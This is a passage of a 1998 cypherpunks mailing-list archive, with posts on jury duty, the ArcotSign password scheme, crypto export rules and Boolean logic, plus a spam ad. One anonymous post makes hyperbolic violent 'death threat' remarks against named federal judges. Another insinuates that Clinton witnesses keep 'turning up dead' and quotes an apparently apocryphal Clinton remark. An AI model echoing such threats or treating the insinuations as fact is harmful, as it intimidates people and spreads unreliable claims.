>Completely illogical. Give me one good reason not to lead with your best
>punch? I suspect Starr's work is voluminous but weak on all other counts
>so he led with what would create the most publicity. I've said that I'm
>no great fan of Clinton's but this entire investigation is blatantly
>partisan and has brought the political process in this country about as
>low as it is possible to bring it. 

The affairs of Men rarely rely upon the dictates of logic, or even common
sense.

National Security. 
International Relations.
Self Interest Re: Future Employment.
Direct and Specific instruction from immediate supervisor. He does report
to a panel of others.

It is weaker than it could be on other counts, due to many/most/all of the
prime candidates selected to testify against the sitting....person, keep
turning up dead. Go Figure.

Certainly it has ties to partisanship. Clarence Thomas. The Demicans made
the rules, now the Publicrats are playing by them. I'm reminded of a line
from the recent movie "Good Will Hunting". "How do you like them apples?"

Certainly it has given the Nation a black eye. We are now down in the
gutter, at what would seem to be Clintons level, discussing the merits of
cigars with or without extra flavoring.

>Starr's base approach to justice is the opening shot of what I hope
>turns into an all-out scorched-earth battle. Let 'em all fall down. I'm
>just afraid that when it's over the only people who will be willing to
>run for public office will be truly dangerous people who have no respect
>for liberty not of their own definition.

Starr's base approach? You mean 'basic' don't you? No, you were right. But
remember, it is all strictly by the Demican play book.

I also agree that the Beltway needs a shakedown, I share your fears. 

Reeza!


"Yes, the president should resign. He has lied to the American people,
time and time again, and betrayed their trust. He is no longer an
effective leader. Since he has admitted guilt, there is no reason to put
the American people through an impeachment. He will serve absolutely no
purpose in finishing out his term; the only possible solution is for the
president to save some dignity and resign."

- William Jefferson Clinton, speaking of Richard M. Nixon, 1974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 23 Sep 1998 23:48:20 +0800
To: Anonymous <nobody@remailer.ch>
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <19980924015428.2767.qmail@hades.rpini.com>
Message-ID: <Pine.BSF.3.91.980922040034.17710C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On 24 Sep 1998, Anonymous wrote:

> On Wed, 23 Sep 1998, Tim May wrote:
> 
> > 
> > At 11:11 PM -0700 9/22/98, Bill Stewart wrote:
> > 
> 

> If they do have a list, I'd kind of like to be on it. I'm a college
> student, and I _can't_ serve on a jury for more than a day or so. The same
> goes for doctors, corporate executives, and others.
> 

Yeah, right. I *never* blew off class to go to the beach. I never go to
"meetings" on the golf course, either. Glad to hear the only people with
important places to be are doctors, executives, and college students. 


> There is an inherent flaw in the jury system. You get summoned and are
> legally required to blow the entire day down at the courthouse. If you're
> a student you miss classes, and if you have a job you miss that too. You
> have to pay for transportation, parking, food, and whatever else you need. 
> In return, you get paid something like $3, which often isn't even enough
> to cover the parking and get told every five minutes that this or that
> will get you, as a juror or potential juror, thrown in jail.

It is a trade-off. If you aren't willing to put in your time, you can't 
complain when somebody else lets OJ off the hook. You can't whine if you 
are convicted by a bunch of people who were to stupid to get out of jury 
duty.

> don't want people who can determine that the evidence of one side or the
> other is suspect. They don't want people who will actually look at the
> facts rather than the emotion of the opening and closing arguments. The
> prosecution sure as hell doesn't want anybody who will look at whether a
> law should exist in the first place.

"They" refers to both sides. We have an adversarial system. Usualy one 
side or the other is willing to keep jurors who are interested in the facts. 
(OK, launch the court-appointed-public-defender rant here)

One of my employees, a white/male/degreed/job holding/computer programmer 
was kicked out by the defense, not the prosecutor.

> 
> "Hey, Doctor! Um, I have to serve on a jury. Can you take all my patients
> for the next six months while I'm locked in a hotel room?

Very few juries are sequestered. In cases where this is likely, jurors 
are often permitted to be excused if a lengthy trial is expected. This is 
a bullshit excuse for ducking jury duty. The longest anyone who works 
with or for me has been absent due to jury duty was three days.


 Oh, and I need
> to still get my full salary to pay my bills. Thanks, buddy." Um, no.
> 

The company I work for pays our salary while we are on jury duty. We have 
to turn over the $3 a day stipend.

> When the trial actually starts, the average juror, regardless of what
> council may tell them about due process, is usually biased in favor of the
> prosecution, especially if the government is claiming that the defendant
> is an evil child molestor. If it's a case involving technology, you get a
> bunch of bogus "experts" up there which say what council wants to be said,
> because real "experts" refuse to dumb down their testimony to a
> kindergarden level.

Most defendants are guilty. That doesn't mean the one in front of you is. 
Take traffic court as an example. How many defandants are there because
they are innocent, and the cop was mistaken, didn't calibrate his radar,
needed to fill his quota, etc.? A few. How many are there because they
want a couple points knocked off the penalty, even theough they were
speeding? Most of them. A guilty defendant is entitled to a fair trial. So
is an innocent one.  You don't help the process by ducking jury duty (or
are you one of the stupid people?). 

> 
> "Mr. May, will you please explain -- in layman's terms -- exactly how the
> microchip fabrication process works?"
> 

The technobable seemed to work in favor of the defense, in the OJ case. 
People have come to understand and accept fingerprinting (although it was 
not accpeted initially). Many seem to be unwilling to trust DNA evidence, 
though.

> 
> Can you imagine trying to be a defense expert in a cryptography case with
> a bunch of jurors who can barely read, are unemployed, hate "nerds," and
> beat the "geeks" up in high school, while the prosecution is constantly
> screaming that the defendant is a kiddy porn trader and you're expected to
> dumb your expert testimony down to kindergarden level? 
> 

One can always request a judge to hear the case.

It isn't a perfect system, but what do you propose as an alternative? 
Should Tim May judge us all? 

Should we revert to anarchy, with whomever is left standing is 
considered innocent, and the dead are the guilty?

-r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 04:47:56 +0800
To: Colin Plumb <doug@arcot.com
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220552.XAA17972@nyx10.nyx.net>
Message-ID: <199809220946.EAA09433@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:52 PM 9/21/98 -0600, Colin Plumb wrote:
>Doug, I'd just like to thank you for replying.  Even without looking at your
>description, the fact that you are willing to talk to doubters and admit
>the limitations of your technique make me a lot more comfortable believing
>that you have something.  You don't fit into either of the two standard
>types of snake-oil salesmen: The "I can't tell you because it's secret"
>sort, and the "it's totally unbreakable, cures world hunger and
>disposes of nuclear waste" sort.
>
>Not that people still don't wonder, but I thought I'd temper the technical
>grilling I see heating up with some appreciation for the fact that you've
>already managed a better impression than 95% of the crypto wannabes
>out there.

Hey, I don't ally myself with the clueless.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 04:47:56 +0800
To: Mok-Kong Shen <cryptography@c2.net
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <199809220946.EAA09436@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:59 AM 9/22/98 +0100, Mok-Kong Shen wrote:
>bram wrote:
>> 
>> On Mon, 21 Sep 1998, Bruce Schneier wrote:
>> 
>> > Here's the basic idea:  Strew a million passwords on your hard drive, and
>> > make it impossible to verify which is the correct one offline.  So,
someone
>> > who steals the password file off the client cannot run a cracking tool
>> > against the file.
>> 
>> Is this really patentable? It sounds a *lot* like the original public-key
>> algorithm (the one involving lots of little 'puzzles')
>
>A question : How does the legitimate user find his password?
>(Sorry for not having followed this thread from the beginning.)

He uses a remembered secret and some mathematical magic.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 06:27:13 +0800
To: Ben Laurie <colin@nyx.net>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220552.XAA17972@nyx10.nyx.net>
Message-ID: <199809221128.GAA19873@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:55 AM 9/22/98 +0100, Ben Laurie wrote:
>Colin Plumb wrote:
>> 
>> Doug, I'd just like to thank you for replying.  Even without looking at
your
>> description, the fact that you are willing to talk to doubters and admit
>> the limitations of your technique make me a lot more comfortable believing
>> that you have something.  You don't fit into either of the two standard
>> types of snake-oil salesmen: The "I can't tell you because it's secret"
>> sort, and the "it's totally unbreakable, cures world hunger and
>> disposes of nuclear waste" sort.
>
>Clearly I failed to understand this, then:
>
>"This note doesn't tell everything about our method--we *are* developing
>a commercial product, after all..."
>
>which somehow doesn't translate to "I can't tell you because it's
>secret", it seems.

Well, _I_ think they can explain everything (and we hope to do an academic
paper on the idea), but it's not my decision.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 06:26:50 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <199809221128.GAA19882@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:48 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Bruce Schneier wrote:
>> 
>> At 08:59 AM 9/22/98 +0100, Mok-Kong Shen wrote:
>
>> >A question : How does the legitimate user find his password?
>> >(Sorry for not having followed this thread from the beginning.)
>> 
>> He uses a remembered secret and some mathematical magic.
>
>Another naive question: Why is the remembered secret not sufficient
>(thus doing away with the magic)?

One of the significant improvements is that the scheme is immune to
offline password guessing attacks.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tperf@usa.net
Date: Tue, 22 Sep 1998 10:34:40 +0800
To: <cypherpunks@toad.com>
Subject: For Women
Message-ID: <199809221523.IAA02406@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Adult:

This message is intended for mature adults.
If it has reached you in error, we apologize.

Are you (or someone you care about) affected by the following 
conditions:

   Impotency
   Deteriorating sexual function due to:
    1. Age
    2. Medical Condition
    3. Medication
    4. Life Style

The Performance Technique can reduce or eliminate
the adverse affects these conditions have on intimate relations.

If not you, maybe a friend, parent or grandparent could benefit.

To immediately read about this revolutionary sex technique

Visit the Performance Technique Home Page:

This is well worth a look. It will change your sex life.

 Click Here
Or go to:http://209.139.56.159/

Good luck - Have fun.

President
Performance Technique



Removal Instructions
------------------------------------------------------------------------
The Mailing List that you are being mailed from was filtered against
the Global Remove List at: http://remove-list.com

Remove-List is a free public service offering to help the general public 
get removed from bulk mailings lists and has not been sent this message. 
If you want their help please add your name to their list and you will 
not receive a bulk email from us or other ethical bulk emailer.
------------------------------------------------------------------------
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 22 Sep 1998 06:28:01 +0800
To: cypherpunks@toad.com
Subject: BXA Crypto Export Rule
Message-ID: <199809221123.HAA31117@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



BXA issued today an interim rule on encryption exports and
easing of limits for select institutions announced in the summer:

   http://jya.com/bxa092298.txt  (83K)

Quote:

   SUMMARY: This interim rule amends the Export Administration 
   Regulations (EAR) by clarifying controls on the export and reexport 
   of encryption items (EI) controlled for ``EI'' reasons on the 
   Commerce Control List. This rule incorporates public comments 
   on an interim rule published in the Federal Register on December 
   30, 1996, and implements new licensing policies for general 
   purpose non-recoverable non-voice encryption commodities or 
   software of any key length for distribution to banks and financial 
   institutions in specified countries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 07:21:19 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <199809221222.HAA27732@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:20 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Bruce Schneier wrote:
>> 
>> At 12:48 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>> >Bruce Schneier wrote:
>
>> >> He uses a remembered secret and some mathematical magic.
>> >
>> >Another naive question: Why is the remembered secret not sufficient
>> >(thus doing away with the magic)?
>> 
>> One of the significant improvements is that the scheme is immune to
>> offline password guessing attacks.
>
>If the 'mathematical magic' is not to be kept secret (as in principle
>shouldn't for all crypto algorithms) then presumably one could
>attack through brute forcing the 'remembered secrect', I guess.

Yes, but only through an on-line protocol.   And if the server has some
kind of "turn the user off after ten bad password guesses," then the
atack doesn't work.

>(I suppose the 'remembered secret' has less bits then the 'password'
>that is to be retrieved from the pool of millions with the
>'mathematical magic'). So the advantages of the scheme appear to
>remain unclear as a matter of principle.

The advantages are that offline password guessing is impossible.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 07:07:22 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809221236.HAA02261@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 11:06:26 +0200 (MEST)
> From: Heinz-Juergen Keller <hjk@dip.de>
> Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)

> > We're doing Boolean Algebra here not Algebra, the rules for transitory
> > functions are different.

> A natural language is *not* boolean.
> It is a Peano-Algebra.(with some more restrictions)
>  [R.Montague: Universal Grammar]

Irrelevant, we're analysing the truth or falsity of a statement, that is
Boolean Algebra.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 07:42:36 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <199809221242.HAA01777@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:28 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Bruce Schneier wrote:
>> 
>> At 02:20 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>
>> >If the 'mathematical magic' is not to be kept secret (as in principle
>> >shouldn't for all crypto algorithms) then presumably one could
>> >attack through brute forcing the 'remembered secrect', I guess.
>> 
>> Yes, but only through an on-line protocol.   And if the server has some
>> kind of "turn the user off after ten bad password guesses," then the
>> atack doesn't work.
>
>I remember someone wrote of the case where the attacker got the
>file with the millions of passwords. Then if he also knows the
>'mathematical magic' he could presumably do offline work. So I
>suppose that the 'mathematical magic' has to be kept secret, which 
>would work against the generally accepted crypto principles.

No.  The online protocol can be public.  Nothing has to be kept secret
in order for this to work.  That would be stupid; we all know that.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 07:14:46 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Peano Algebra and it's base theorem
Message-ID: <199809221242.HAA02351@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Peano Algebra's are based on the following:

If a unary predicate P holds for 0, and if P holds, together with an element
x, also for it's succesor x', then P  holds for all natural numbers.

The question under consideration is NOT an attempt to describe a language in
a Sigma structure/algebra/model. We are NOT trying to analyze the language
but rather a specific mathematical statement made IN that language.

They are not the same problem and hence Peano Algebra's do NOT apply.

Nice straw man, I had to drag a math book out to refresh what a Peano
Algebra was (don't think I've ever had to deal with one).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 07:16:23 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221245.HAA02410@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Neels Kriek" <kriek@bigfoot.com>
> Subject: Re: Stego-empty hard drives... (fwd)
> Date: Tue, 22 Sep 1998 01:52:03 -0500

> I have bee using Encrypted magic Folders for a while now.  it gives you the
> option of encrypting all files in a specific folder. it can also do file
> name scrambling and even hide all the files in a directory from the OS.
> 
> It activates through a hot key combination.  You work on the files you want
> and when you exit emf the whole dir is hidden again.  probably not the most
> secure system but it will certainly fool most them if you disable booting
> from a stiffy/floppy.

The problem is this approach is detectible with a suitable 'virus scanner'
technology. Even if the encrypted folders and such don't appear in the file
system you have various other pieces of the processing agent that must sit
around on the drive and hence are open to signature attacks.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 07:18:13 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: CHALLENGE response (fwd)
Message-ID: <199809221246.HAA02464@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 08:01:07 +0200
> From: Anonymous <nobody@replay.com>
> Subject: CHALLENGE response

> "Contrary to one famous philosopher,
> you're saying the medium is not the
> message," Judge Thomas Nelson said,
> alluding to the media theorist Marshall
> McLuhan. 
> http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html
> 
>   Bullshit!
>   The bits and bytes of email encryption are a clear message
> that I wish to exercise my right to speak freely, without those
> who wish to do me harm invading my privacy.

If you're going to take that tack then you need to invoke freedom of the
press and not freedom of speech.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 07:48:11 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <199809221250.HAA03398@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:47 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Bruce Schneier wrote:
>> 
>> At 02:28 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>> >Bruce Schneier wrote:
>> >>
>> >> At 02:20 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>> >
>> >> >If the 'mathematical magic' is not to be kept secret (as in principle
>> >> >shouldn't for all crypto algorithms) then presumably one could
>> >> >attack through brute forcing the 'remembered secrect', I guess.
>> >>
>> >> Yes, but only through an on-line protocol.   And if the server has some
>> >> kind of "turn the user off after ten bad password guesses," then the
>> >> atack doesn't work.
>> >
>> >I remember someone wrote of the case where the attacker got the
>> >file with the millions of passwords. Then if he also knows the
>> >'mathematical magic' he could presumably do offline work. So I
>> >suppose that the 'mathematical magic' has to be kept secret, which
>> >would work against the generally accepted crypto principles.
>> 
>> No.  The online protocol can be public.  Nothing has to be kept secret
>> in order for this to work.  That would be stupid; we all know that.
>
>I suppose you misunderstood me. I mean the 'mathematical magic'
>cannot be made public. (Or is 'online protocol' = 'mathematical magic'?)
>If the 'magic' is public then the attacker with the pool of passwords
>could brute force offline.

No.  You misunderstood me.  There is NOTHING secret except the key.
The online protocol, mathematical magic, source code, algorithm details,
and everything else can be made public.  There are no secrets in the
system except for the keys.

Yes, it's not obvious how you do this.  That's why Arcot is turning this
into a product--it's a good idea.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 07:50:27 +0800
To: Ben Laurie <ben@algroup.co.uk>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220552.XAA17972@nyx10.nyx.net>
Message-ID: <199809221251.HAA03621@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:57 PM 9/22/98 +0100, Ben Laurie wrote:
I hope you manage to persaude them then, because, as we all know, if it
>is kept secret, then even B. Schneier saying it is great will not rescue
>them from the snake-oil branding.

I'm working on it.  I think I will be successful.  They know that they have to
make their sytem public if people are going to use it.  At this point, keeping
things under wraps give them a competitive edge.  There will be a point where
they have to make all the details public.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 00:58:44 +0800
To: cypherpunks@cyberpass.net
Subject: CHALLENGE response
Message-ID: <199809220601.IAA30078@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQEMAzJEMpEAAAED/0jftmc14q6/r/pGe61N+QymMfQlUdrMNWSl9n9wnst1BGft
/GztVfzwS5QDPc2vAvCJjeYFBj60BbJpILMC6rGH7pnc/GFcQjQDUJzHfGHASkDl
2jvDbzG8f7I5oM6NAC5thtjmMoe9FasHMW+lQ3B3IFNSFgIULM5WpAclQcU1A/0S
K/k9FEU/SX93bC3SqTwwdaW9bvksN6Tqs8YSmVcRCoCAQQrTB9i0I+1y86gA9DnC
UR0EuvalZ54+g/+4G0TOqLVoeSXYhyktqwrIFmwDyK3RPEU6OkwxzlBALNvEKzKB
SsdTm7J6O+jg56yEI3YyyBJM6N+zKvmm7DGB8I2+IbQKVG90bywgdG9vP4kAlQMF
EDYHKcPOVqQHJUHFNQEB7RID/0H14HGr6lB8bqWCxoZfoZ97oHFEURrYVxOGb5MP
ZOOEKCk5d/Q/9d0D0imSZRrV6EQRsiuhA9d0LQy0DuLQC3/NguKFK0Z3fY9gT8/q
xV9JJmmoYTjSEDke0RfexfvNDuOa9aISVxndwYGkkYlUcsZBmOeo1OKPdhWCLbnI
CsB7
=cutG
-----END PGP PUBLIC KEY BLOCK-----




-----BEGIN PGP SIGNED MESSAGE-----


Interested readers may want to verify that the key above does give a
valid signature when applied to the message below.

(It will be necessary to remove any existing key with keyid 0x2541C535
before this key can be added to the keyring.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNgcq+c5WpAclQcU1AQHnZQP+NrThyaPmy8BDw21geFB3B1s59QJJ4Ycs
i1yqu9p6NZfb6qD2pF8AnOSOUMA3KCs98fKMJU9S9TN9eTk5DRbIvXHHSdhMRhuw
qDlmcpy4HggT9yHK0vjOTm6UUR/xkvt0WCheAQEe9ZeshFyPa5BAJ7Sqy2dcI1Xv
X3DzB5pn2yk=
=SmV7
-----END PGP SIGNATURE-----




-----BEGIN PGP SIGNED MESSAGE-----



"Contrary to one famous philosopher,
you're saying the medium is not the
message," Judge Thomas Nelson said,
alluding to the media theorist Marshall
McLuhan. 
http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html

  Bullshit!
  The bits and bytes of email encryption are a clear message
that I wish to exercise my right to speak freely, without those
who wish to do me harm invading my privacy.
  The death of strong encryption on the InterNet will be the
global death of free speech on the InterNet. Accordingly, I 
feel it is necessary to make a stand and declare that I stand
ready and willing to fight to the death against anyone who
takes it upon themselves to try to imprison me behind an
ElectroMagnetic Curtain.

  This includes the Ninth Distric Court judges, if they come to
the conclusion that the government that they represent needs to
electronically imprison their citizens 'for their own safety.'


The problem: Criminals with a simple
encryption program can scramble their data
beyond even the government's ability to read it. 
http://www.zdnet.com/zdnn/content/zdnn/1208/261695.html

  Fuck the lame LEA pricks who whine about not being able to
stop someone bringing in a planeload of drugs without being
able to invade the privacy of every person on the face of
the earth.
  Am I supposed to believe that I have knowledge of when and
where major drug shipments are taking place, simply by virtue
of hanging out as a musician, yet the LEA's are incapable of
finding out the same information by being competent in their
profession? Barf City...
 [I will shortly provide information for any LEA which wishes
  to prosecute me for my coming 'physical' death threat, on
  how to hunt me down like the filthy dog that I am.]

"Why are you saying that the fact that [encryption]
is functional takes it out of the First Amendment
context?" Myron Bright, one of the judges, asked
the Justice Department attorney, who was still in
mid-sentence. He answered that the regulations
were not aimed at suppressing speech, but only at
the physical capacity of encryption to thwart
government intelligence gathering. 

  The Spanish language has the same "physical capacity." So 
does (:>), (;[), and {;-|). Likewise, BTW, FWIW, FYI, and
my own personal favorite, YMMV (You Make Me Vomit? --or--
Your Mileage May Vary?). <-- Ambidextrous encryption.
  An-cay e-way pect-exay ig-pay atin-lay usts-bay of 
ildren-chay?
  Whispering also has the "physical capacity" to "thwart 
government intelligence gathering."

  When does the bullshit stop? When do we stop making the
use of the Spanish language over the InterNet illegal?
When do we stop making whispering, pig-latin, anagrams
and acronyms illegal?
  When do we stop saying that our government is such a
piece of crap that it is a danger to let its citizens
communicate freely, in private, and share their private
thoughts with one another?


At one point Fletcher called the government's case 
"puzzling."
http://www.news.com/News/Item/0,4,17114,00.html

  Only because her mom taught her that it was unladylike to
say "Bullshit!"


In arguments Monday, a Justice Department
lawyer, Scott McIntosh, said the government's
intent was to preserve the ability of intelligence
agencies to eavesdrop on foreign governments
and citizens. 
http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html

  Let's see if I have this right...
  The U.S. government needs to destroy the right to free speech 
and right to privacy of its own citizens in order to infringe
upon the human rights of the governments and citizens of other
countries? Countries which already have strong encryption?
Countries like Red China, which is currently engaged in 
encryption research with an American company who got permission
to export much more diverse encryption material (after making
a huge campaign donation to the Whitehouse) than Professor
Bernstein will ever likely share with others?
  Apologies to Judge Fletcher, but that's not "puzzling." That's
the same-old-same-old Bullshit!


OFFICIAL 'PHYSICAL' DEATH THREAT!!!
  The pen is mightier than the sword. Thus, I prefer to wage my
'war to the death' against those who would stomp on my basic
human rights *"in the interests of National Security"* with my
electronic pen, on the InterNet, using encryption when I have
reason to fear persecution by Facist, Nazi motherfuckers.
[* ~~ TruthMonger Vernacular Translation ~~ "so that the 
 government can maintain its authority over the citizens
 by use of force and violation of human rights, rather than
 going to all of the trouble of acting in a manner that will
 garner the citizens' respect."]

  I will continue to express my thoughts through the words
I send electronically over the InterNet, both publically
and privately. I will fight to the bandwidth death against
anyone who wants to deny me my right to express my opinions
and access the opinions of those who also wish to express
their own opinions and share their true thoughts with their
fellow humans.
  If the ElectronicMagnetic Curtain slams down around me, 
then I will have no choice but to continue my current fight
in MeatSpace.
  And I am not alone...

  I will share the same 'DEATH THREAT!!!' with Judges Fletcher,
Nelson and Bright that I have shared with the President and
a host of Congressional and Senatorial representatives:
  "You can fuck some of the people all of the time, and all of
the people some of the time, but you are going to end up in a
body bag or a pine box before you manage to fuck all of the
people all of the time."

  Am *I* going to whack you out? Maybe...
  I would prefer just dumping some tea in Boston Harbor, if that
will get my message across in MeatSpace, but if it won't, then
I guess I will have to take stronger action.
  There are undoubtedly a plethora of LEA's ready and willing to
prosecute and imprison me for agreeing with Patrick Henry, who
said, "Give me liberty, or give me death." The irony, of course,
is that I do not pose a great danger to anyone but myself as
long as I continue to have my human rights and my liberty
unthreatened.

  The chances of me actually getting off of my fat butt and
going out into the real world to whack out the enemies of
freedom are probably pretty small (unless I run out of 
cigarettes and beer, and wouldn't have to make an extra 
trip).
